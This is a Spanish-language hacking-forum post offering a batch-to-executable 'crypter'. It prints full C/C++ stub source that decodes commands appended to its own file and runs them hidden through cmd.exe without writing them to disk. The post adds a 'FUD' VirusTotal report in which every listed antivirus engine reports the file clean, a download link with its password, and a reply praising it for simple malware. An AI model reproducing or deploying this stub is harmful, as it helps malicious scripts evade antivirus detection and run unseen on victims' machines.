Hola, esta es una herramienta para quienes se dedican a programar scripts o sus cosas en batch, lo que hace este compilador es pasar tu programa a Ejecutable y lo crypta
y en ningún momento crea en el disco el archivo ni desencryptado ni cryptado, ejecuta comando por comando en memoria.
Puede usarse la variable %0 para autocopiarse con el nombre del ejecutable.
(http://i59.tinypic.com/r73g3b.png)
Código del Stub! [C/C++]
#include <windows.h>
int __stdcall ExecuteCommand ( IN LPSTR lpszCommand );
int __stdcall Decrypt ( LPSTR String, LPSTR Out );
int __stdcall ExecuteCommand ( IN LPSTR lpszCommand )
{
LPSTR szPath;
char newcommand [ lstrlenA ( lpszCommand ) + 50 ];
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory ( &si, sizeof ( si ) );
ZeroMemory ( &pi, sizeof ( pi ) );
si.cb = sizeof ( si );
szPath = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
GetSystemDirectoryA ( szPath, MAX_PATH );
CopyMemory ( &szPath [ lstrlenA ( szPath ) ], &"\\cmd.exe", lstrlenA ( "cmd.exe" ) + 1 );
wsprintfA ( newcommand, "/c %s", lpszCommand );
CreateProcessA ( szPath, newcommand, 0, 0, false, CREATE_NO_WINDOW, 0, 0, &si, &pi );
//ShellExecuteA ( HWND_DESKTOP, "open", szPath, newcommand, 0, SW_HIDE );
WaitForSingleObject ( pi.hProcess, INFINITE );
CloseHandle ( pi.hProcess );
CloseHandle ( pi.hThread );
GlobalFree ( szPath );
return 0;
}
//Funcion para desencryptar palabras
int __stdcall Decrypt ( LPSTR String, LPSTR Out )
{
for ( ; *String != '\0'; *String ++ )
{
if ( ( *String >= 65 ) && ( *String < 90 ) )
{
*Out = *String - 1;
}
else if ( ( *String >= 65 ) && ( *String == 90 ) )
{
*Out = *String + 1;
}
else if ( ( *String >= 97 ) && ( *String < 122 ) )
{
*Out = *String - 1;
}
else if ( ( *String >= 97 ) && ( *String == 122 ) )
{
*Out = *String - 1;
}
else
{
*Out = *String;
}
*Out ++;
}
return 0;
}
int WINAPI WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
LPSTR lpszArgument, int nCmdFunstil )
{
DWORD dwBytes, dwSize;
HANDLE File;
LPSTR Buffer, Command, AppName, backup;
register DWORD bytes = 0, x = 0, total = 0, test = 0;
AppName = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( MAX_PATH + 1 ) );
GetModuleFileNameA ( GetModuleHandleA ( 0L ), AppName, MAX_PATH );
File = CreateFileA ( AppName, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0 );
if ( File == INVALID_HANDLE_VALUE )
{
CloseHandle ( File );
return EXIT_FAILURE;
}
dwSize = GetFileSize ( File, 0 );
Buffer = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( dwSize + 1 ) );
ReadFile ( File, Buffer, dwSize, &dwBytes, 0 );
CloseHandle ( File );
//Buscamos la firma de nuestro programa.
for ( bytes; bytes <= dwSize; bytes ++ )
{
if ( Buffer [ bytes ] == '*' && Buffer [ bytes + 1 ] == '+' &&
Buffer [ bytes + 2 ] == '+' && Buffer [ bytes + 3 ] == '*' )
{
//Ajustamos el buffer y el nuevo tamaño.
Buffer += ( bytes + 4 );
dwSize -= ( bytes + 4 );
break;
}
}
//Desencryptamos el codigo en nustro EOF.
backup = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( Buffer + 1 ) ) );
CopyMemory ( &backup [ 0 ], &Buffer [ 0 ], lstrlenA ( Buffer ) );
GlobalFree ( Buffer );
Buffer = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( backup ) + 1 ) );
Decrypt ( backup, Buffer );
GlobalFree ( backup );
for ( bytes = 0; bytes <= lstrlenA ( Buffer ); bytes ++ )
{
if ( Buffer [ bytes ] == 13 || Buffer [ bytes ] == '\n' )
{
Command = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( bytes + 10 ) );
CopyMemory ( &Command [ 0 ], &Buffer [ 0 ], ( bytes ) );
total = lstrlenA ( Command );
for ( x = 0; x <= total; x ++ )
{
//En caso de existir la variable %0 - la sustituimos por la ruta de nuestro ejecutable.
if ( ( Command [ x ] == '%' ) && ( Command [ x + 1 ] == 48 ) )
{
backup = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( Command ) + 1 ) );
CopyMemory ( &backup [ 0 ], &Command [ 0 ], lstrlenA ( Command ) );
GlobalFree ( Command );
Command = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( bytes + lstrlenA ( AppName ) + MAX_PATH ) );
CopyMemory ( &Command [ 0 ], &backup [ 0 ], x - 1 );
lstrcatA ( Command, " " );
backup += ( x + 2 );
CopyMemory ( &Command [ lstrlenA ( Command ) ], &AppName [ 0 ], lstrlenA ( AppName ) );
CopyMemory ( &Command [ lstrlenA ( Command ) ], &backup [ 0 ], total - ( x + 2 ) );
GlobalFree ( backup );
break;
}
}
for ( test = 0; test <= lstrlenA ( Command ); test ++ )
{
if ( ( Command [ test ] == 13 ) || ( Command [ test ] == '\n' ) )
{
backup = ( LPSTR ) GlobalAlloc ( ( 0x0000 | 0x0040 ), ( lstrlenA ( Command ) + 1 ) );
CopyMemory ( &backup [ 0 ], &Command [ 0 ], test );
ExecuteCommand ( backup );
Command += ( test + 1 );
GlobalFree ( backup );
}
}
//Ejecutamos el comando
ExecuteCommand ( Command );
//Reajustamos el buffer.
Buffer += ( bytes + 2 );
//Liberamos el buffer.
GlobalFree ( Command );
}
}
GlobalFree ( AppName );
GlobalFree ( Buffer );
return EXIT_SUCCESS;
}
ANALISIS FUD
https://www.virustotal.com/es/file/fa0463bec54d2fd2c2417cd4e993b6c889231d0db6934ebfcfc3c58d867e1edc/analysis/1439185320/ (https://www.virustotal.com/es/file/fa0463bec54d2fd2c2417cd4e993b6c889231d0db6934ebfcfc3c58d867e1edc/analysis/1439185320/)
Antivirus Resultado Actualización
ALYac 20150805 Clean
AVG 20150805 Clean
AVware 20150805 Clean
Ad-Aware 20150805 Clean
AegisLab 20150805 Clean
Agnitum 20150804 Clean
AhnLab-V3 20150805 Clean
Alibaba 20150803 Clean
Antiy-AVL 20150805 Clean
Arcabit 20150805 Clean
Avast 20150805 Clean
Avira 20150805 Clean
Baidu-International 20150805 Clean
BitDefender 20150805 Clean
Bkav 20150805 Clean
ByteHero 20150805 Clean
CAT-QuickHeal 20150805 Clean
ClamAV 20150805 Clean
Comodo 20150805 Clean
Cyren 20150805 Clean
DrWeb 20150805 Clean
ESET-NOD32 20150805 Clean
Emsisoft 20150805 Clean
F-Prot 20150805 Clean
F-Secure 20150805 Clean
Fortinet 20150804 Clean
GData 20150805 Clean
Ikarus 20150805 Clean
Jiangmin 20150804 Clean
K7AntiVirus 20150805 Clean
K7GW 20150805 Clean
Kaspersky 20150805 Clean
Kingsoft 20150805 Clean
Malwarebytes 20150805 Clean
McAfee 20150805 Clean
McAfee-GW-Edition 20150805 Clean
MicroWorld-eScan 20150805 Clean
Microsoft 20150805 Clean
NANO-Antivirus 20150805 Clean
Panda 20150805 Clean
Qihoo-360 20150805 Clean
Rising 20150731 Clean
SUPERAntiSpyware 20150805 Clean
Sophos 20150805 Clean
Symantec 20150805 Clean
Tencent 20150805 Clean
TheHacker 20150805 Clean
TotalDefense 20150805 Clean
TrendMicro 20150805 Clean
TrendMicro-HouseCall 20150805 Clean
VBA32 20150805 Clean
VIPRE 20150805 Clean
ViRobot 20150805 Clean
Zillya 20150805 Clean
Zoner 20150805 Clean
nProtect 20150805 Clean
Link de descarga:
https://mega.co.nz/#!zhhQwRKS!C_IsGCohosSGorjNMibdVSuVIS67C0yK3Q66kQbDIg4 (https://mega.co.nz/#!zhhQwRKS!C_IsGCohosSGorjNMibdVSuVIS67C0yK3Q66kQbDIg4)
PASS: xxneeco83xx
Clásico pero efectivo, muchas gracias @xxneeco83xx (https://underc0de.org/foro/index.php?action=profile;u=48441)
¡Por nada! Si bien hay muchas cosas que se le pueden agregar y mejorar, es práctico para esos scripts o malwares simples.